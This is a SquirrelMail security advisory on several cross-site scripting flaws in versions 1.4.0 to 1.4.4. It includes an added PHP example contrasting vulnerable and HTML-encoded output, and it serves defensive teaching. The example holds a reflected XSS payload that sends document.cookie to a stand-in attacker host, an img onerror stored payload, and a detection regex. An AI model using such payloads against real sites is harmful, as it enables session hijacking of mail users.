Several cross-site scripting vulnerabilities
- Several cross-site scripting (XSS) vulnerabilities have been discovered in SquirrelMail versions 1.4.0 - 1.4.4. These have been addressed in a patch that has been uploaded to the SF.net file release system. We advise all our users to apply this patch. We are also releasing SquirrelMail 1.4.5 release candidate 1 at the same time, and we expect version 1.4.5 to be out within two weeks from now.
The vulnerabilities fall into two categories: the majority can be exploited through URL manipulation, and some by sending a specially crafted email to a victim. Crafted carefully, either kind can be used to hijack the victim's session.
We know that versions 1.4.0 to 1.4.3a are vulnerable to most of the issues. The 1.2.x series is not supported anymore; we advise users of that series to upgrade to 1.4.4 with the patch applied.
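The two vectors named above, a value reflected from a URL parameter and a value stored in message content, shown side by side in vulnerable and hardened form. This is an added PHP illustration, not SquirrelMail code and not part of the original advisory; the parameter name `mailbox`, the `subject` field and the attacker host are assumptions made for the example, and the inputs are constructed.

```php
<?php
// Added illustration for this advisory; it is not SquirrelMail code and the
// parameter and field names ("mailbox", "subject") are hypothetical.
declare(strict_types=1);

// Constructed inputs standing in for the two vectors the advisory names:
// a value taken from the URL query string (reflected vector) and a header
// taken from a received message (stored vector). An attacker controls both.
const REFLECTED_INPUT = [
    'mailbox' => 'INBOX"><script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>',
];
const STORED_INPUT = [
    'subject' => 'Hello <img src=x onerror="alert(document.cookie)">',
];

// Vulnerable pattern: untrusted strings concatenated straight into HTML.
// Nothing here depends on register_globals; request data is read explicitly,
// which is why that setting being off offers no protection against this class.
function render_vulnerable(array $get, array $msg): string
{
    return '<input type="hidden" name="mailbox" value="' . $get['mailbox'] . '">'
         . "\n<td>" . $msg['subject'] . '</td>';
}

// Hardened pattern: every untrusted value is HTML-encoded at the point it is
// written into the page. ENT_QUOTES matters because the first value sits
// inside a double-quoted attribute, where a bare " would end the attribute.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_hardened(array $get, array $msg): string
{
    return '<input type="hidden" name="mailbox" value="' . h($get['mailbox']) . '">'
         . "\n<td>" . h($msg['subject']) . '</td>';
}

// Crude regression check: tag or quoted event-handler markup from the
// attacker-controlled inputs must not survive into the rendered page.
function contains_live_markup(string $html): bool
{
    return (bool) preg_match('/<script|<img\b|onerror\s*=\s*["\']/i', $html);
}

$unsafe = render_vulnerable(REFLECTED_INPUT, STORED_INPUT);
$safe   = render_hardened(REFLECTED_INPUT, STORED_INPUT);

var_dump(contains_live_markup($unsafe));
var_dump(contains_live_markup($safe));
echo $safe, "\n";
```

The reflected payload posts `document.cookie` to an attacker host, which is the session-hijack outcome the advisory warns about; the stored payload arrives in a mail header and fires when the victim merely lists the folder. Encoding at the sink is the generic fix for both. Marking the session cookie HttpOnly (`session.cookie_httponly`, PHP 5.2 and later) limits cookie theft of the kind shown but does not stop an injected script from issuing requests inside the victim's session.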
- Affected Versions:
- <= 1.4.4
- Register Globals:
- register_globals does not have to be on for these issues to be exploitable.
- CVE ID(s):
- view patch
- Thanks to Martijn Brinkers for finding the majority of the issues.
- This page last updated:
- 2006-07-09 15:52:28